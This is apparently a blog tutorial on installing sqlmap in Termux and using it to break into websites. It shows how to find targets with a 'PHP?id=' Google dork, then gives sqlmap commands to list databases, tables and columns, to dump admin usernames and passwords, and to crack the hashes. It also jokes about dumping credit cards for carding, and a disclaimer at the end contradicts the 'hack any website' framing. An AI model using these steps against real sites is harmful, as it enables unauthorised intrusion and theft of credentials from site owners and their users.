In this article, I am going to show you how to install and use SQLMAP in
Termux. First of all, SQLMAP is an open-source tool that automatically
detects and exploits SQL injection bugs. By doing a SQL injection
attack, an attacker can take over and manipulate a database on a server.
So from that, we can steal or retrieve a database from a website that we
want For example, we can retrieve website admin id and password from
the database.
And if you are lucky, you can get a CC (Credit Card/credit card) for
those who like carding, can dump cc here just joking ok. Don't do any
illegal activity with SQLMAP.😂😂
Ok now let's get started
Things needed:
- An android device with android version 5.0 or up.
- Termux application: Download.
- Good internet connection.
If you downloaded the Termux launch the Termux app.
First We are going to update the package list with the command:
apt update
Now we have to install Python with the following command:
apt install python python2
Wait until python is installed. After installing python we will install git. Git will help you to clone the package.
apt install git
After installing git we are going to clone the SQLMAP package into our directory with the help of the git command.
Wait for the process to be
finished. As the process is finished now we need to enter the tool
directory with the following command.
cd sqlmap
Now we need to give them permission to read-write and execute the SQLMAP python file by using the command:
chmod +x sqlmap.py
After that, you need to run the following command to run the SQLMAP
python2 sqlmap.py
Now SQLMAP is successfully installed on your Termux.
If you want to run SQLMAP again
next time then you need to launch the Termux then you need to enter the
directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.
Now let's see how to hack the website using SQLMAP
First, let me tell you. You can hack the websites that have SQL injection vulnerability.
Now you might be thinking about how to find a website that has SQL injection vulnerability.
You can use google dorks to find out SQL injection vulnerability in the website.
Most of the website have SQL injection vulnerability start with PHP?id=1 or any kind of value which is present after PHP?id=
To find the vulnerable websites you can use this google dork inurl: PHP?id=1 or any value after PHP?id=
Type the following command:
This command will help you to find out the database of the website
python2 sqlmap.py -u <your website> --dbs
If the website is vulnerable then you will found the output similar to this:
*Information_schema
*Database
Now our next step is to find tables that are present in the database with the following command
python2 sqlmap.py -u <your website> –D Database –tables
The above command tells Sqlmap to find out tables that are present under the database.
Note: You will see information schema don't waste your time in finding credentials or any juicy information in that schema because information schema is of no use.
After running the above command you will see tables something like this.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin --columns
The above command tells Sqlmap to find out columns under the table admin.
Now let's move on to our final command.
For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
The above command will save username and password in text form.
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later
Note: Remove <your website> with the URL of the website that you want to hack make sure the website URL must end with PHP?id= 1 or any value after it. If you give a simple URL without PHP?id= then the SQLMAP will not work.
Note :
I Am not responsible for any illegal activity done with this information. This article is for educational purposes only. Use this information to find the vulnerability in your own website. Don't use this information to hack another website. Website hacking without the written permission of the website owner is illegal. And you can be in trouble if you are hacking the website without the written permission of the website owner.
6 Comments
thanks brother
ReplyDeleteNo need vro just keep supporting us 👍👍
Deletethanks sir
ReplyDeleteNo need vro just keep supporting us 👍👍
Delete;-)
DeleteKeep supporting us 👍👍
Delete